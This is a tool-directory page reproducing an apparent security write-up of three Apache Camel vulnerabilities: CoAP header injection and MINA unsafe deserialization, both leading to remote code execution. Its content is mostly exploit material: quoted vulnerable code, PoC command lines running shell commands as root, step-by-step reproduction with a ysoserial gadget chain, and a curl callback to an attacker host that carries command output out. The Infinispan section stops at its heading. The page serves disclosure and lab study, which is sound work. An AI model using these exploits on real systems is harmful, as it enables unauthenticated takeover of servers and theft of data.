Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-33453 — Provides working proof-of-concept exploits and detailed analysis for three critical Apache Camel vulnerabilities, including CoAP header injection and unsafe deserialization leading to remote code execution. | Kitploit
Tools/GitHubGitHub/dinosn/cve-2026-33453
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingBinary Exploitation
GitHubdinosn/cve-2026-33453

CVE-2026-33453

Provides working proof-of-concept exploits and detailed analysis for three critical Apache Camel vulnerabilities, including CoAP header injection and unsafe deserialization leading to remote code execution.

View Repository
365 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Apache Camel 4.18.0 — CVE Security Assessment

Three critical vulnerabilities in Apache Camel 4.18.0, independently discovered and validated with working proof-of-concept exploits.

CVEComponentTypeCVSSVerdict
CVE-2026-33453camel-coapHeader Injection → RCE10.0 CriticalExploitable
CVE-2026-40473camel-minaUnsafe Deserialization → RCE9.8 CriticalExploitable
CVE-2026-40858camel-infinispanUnsafe Deserialization8.8 HighExploitable

CVE-2026-33453: CoAP Header Injection → Remote Code Execution

Component: camel-coap — CamelCoapResource.java:103-109 CWE: CWE-915 (Improperly Controlled Modification of Object Attributes) Fixed in: Camel 4.18.1 / 4.14.6

Root Cause

CamelCoapResource.handleRequest() maps CoAP URI query parameters directly into Camel Exchange headers via setHeader() with no HeaderFilterStrategy. CoAPEndpoint extends DefaultEndpoint instead of DefaultHeaderFilterStrategyEndpoint, so internal Camel*-prefixed headers can be injected by any unauthenticated client.

When the route forwards to camel-exec, the attacker-controlled CamelExecCommandExecutable and CamelExecCommandArgs headers override the configured command, achieving pre-authenticated RCE via a single UDP packet.

// CamelCoapResource.java:103-109 — NO HeaderFilterStrategy
for (String s : options.getUriQuery()) {
    int i = s.indexOf('=');
    if (i == -1) {
        camelExchange.getIn().setHeader(s, "");
    } else {
        camelExchange.getIn().setHeader(s.substring(0, i), s.substring(i + 1));
    }
}

PoC Result

CoAP RCE PoC

$ python3 exploits/exploit_cve_2026_33453_coap.py 127.0.0.1 'cat /etc/hostname'
[+] Response: 2.05
[+] Command output: cf6ee154412e

$ python3 exploits/exploit_cve_2026_33453_coap.py 127.0.0.1 'ls /'
[+] Command output: app bin boot dev etc home lib ...

CVE-2026-40473: MINA Unsafe Deserialization → Remote Code Execution

Component: camel-mina — MinaConverter.java:60-63 CWE: CWE-502 (Deserialization of Untrusted Data) Fixed in: Camel 4.18.2 / 4.14.6 / 4.20.0

Root Cause

MinaConverter.toObjectInput(IoBuffer) creates a raw java.io.ObjectInputStream with no ObjectInputFilter. When a MINA endpoint is configured with allowDefaultCodec=false, raw TCP data arrives as an IoBuffer and reaches Camel's type converter, which calls this method — wrapping attacker-controlled network bytes in an unfiltered ObjectInputStream.

// MinaConverter.java:60-63 — NO ObjectInputFilter
@Converter
public static ObjectInput toObjectInput(IoBuffer buffer) throws IOException {
    InputStream is = toInputStream(buffer);
    return new ObjectInputStream(is);  // attacker-controlled bytes, NO FILTER
}

Attack path: The exploit targets a MINA TCP endpoint with allowDefaultCodec=false (port 9879 in the PoC). This bypasses MINA's codec layer entirely — the ObjectSerializationCodecFactory has its own ClassNameMatcher allowlist that would otherwise block arbitrary classes. With the codec disabled, raw bytes flow straight to MinaConverter.toObjectInput() which creates a standard ObjectInputStream with zero class filtering.

A CommonsCollections6 gadget chain (via ysoserial) achieves arbitrary command execution as root. Command output is exfiltrated via a curl callback to the attacker.

PoC Result

MINA RCE PoC

$ python3 exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 id
[+] Command output:
    uid=0(root) gid=0(root) groups=0(root)
[+] CONFIRMED: CVE-2026-40473 RCE — command executed via deserialization

$ python3 exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 'uname -a'
[+] Command output:
    Linux 8b1462d5c89d 6.12.76-linuxkit #1 SMP Sun Mar  8 14:41:59 UTC 2026 aarch64 GNU/Linux

Reproducing CVE-2026-40473 Step-by-Step

Prerequisites

  • Docker and Docker Compose
  • Python 3.8+
  • Java 17+ (for ysoserial)
  • ysoserial — ysoserial-all.jar (CommonsCollections6 gadget)

Step 1: Build and Start the Vulnerable Server

cd poc/
docker compose up -d --build

Wait for the container to start, then verify:

docker logs vuln-camel-mina

You should see:

MINA Setup

[*] Vulnerable MINA server started
[*] Port 9877: transferExchange (Java deser) endpoint
[*] Port 9878: Object serialization codec endpoint
[*] Port 9879: Raw TCP (MinaConverter.toObjectInput) endpoint
[*] Waiting for connections...

Port 9879 is the target — it uses allowDefaultCodec=false, which disables MINA's codec filter and lets raw IoBuffer reach Camel's unfiltered MinaConverter.toObjectInput().

Step 2: Confirm Deserialization (Probe Mode)

First, verify that the endpoint accepts and deserializes arbitrary Java objects with no ObjectInputFilter:

python3 poc/exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 --probe

MINA Probe

[*] Probe mode — confirming deserialization (no RCE)
[*] Payload: HashMap (82 bytes, raw — no MINA frame)
[+] Connected to MINA endpoint
[+] Payload sent
[+] Data reached readObject() with no filter rejection

The probe sends a serialized HashMap. The server deserializes it via ObjectInputStream.readObject() with no InvalidClassException — confirming zero class filtering.

Step 3: Execute Commands (Full RCE)

With ysoserial available, exploit the unfiltered deserialization for arbitrary command execution:

# Execute 'id' — returns uid=0(root)
python3 poc/exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 id

# Read files
python3 poc/exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 'cat /etc/hostname'

# System info
python3 poc/exploits/exploit_cve_2026_40473_mina.py 127.0.0.1 9879 'uname -a'

The exploit generates a CommonsCollections6 gadget chain, sends it as raw bytes to port 9879, and captures the command output via a curl callback listener.

Exploit Options

usage: exploit_cve_2026_40473_mina.py [-h] [--ysoserial PATH] [--callback-host HOST]
                                       [--gadget GADGET] [--probe] [--raw]
                                       target [port] [command]

  target           Target IP/hostname
  port             MINA TCP port (default: 9879)
  command          Command to execute (default: id)
  --ysoserial      Path to ysoserial.jar (auto-detected if not set)
  --callback-host  Host the container uses to reach you (default: host.docker.internal)
  --gadget         ysoserial gadget chain (default: auto — tries CC6, CC5, CC1)
  --probe          Probe mode only — confirm deserialization without RCE
  --raw            Send raw payload without MINA 4-byte frame (auto-enabled for port 9879)

Note: The --callback-host defaults to host.docker.internal (Docker Desktop). If running on Linux without Docker Desktop, use --callback-host 172.17.0.1 or your Docker bridge IP.

Step 4: Cleanup

cd poc/
docker compose down

CVE-2026-40858: Infinispan Unsafe Deserialization

Download Tool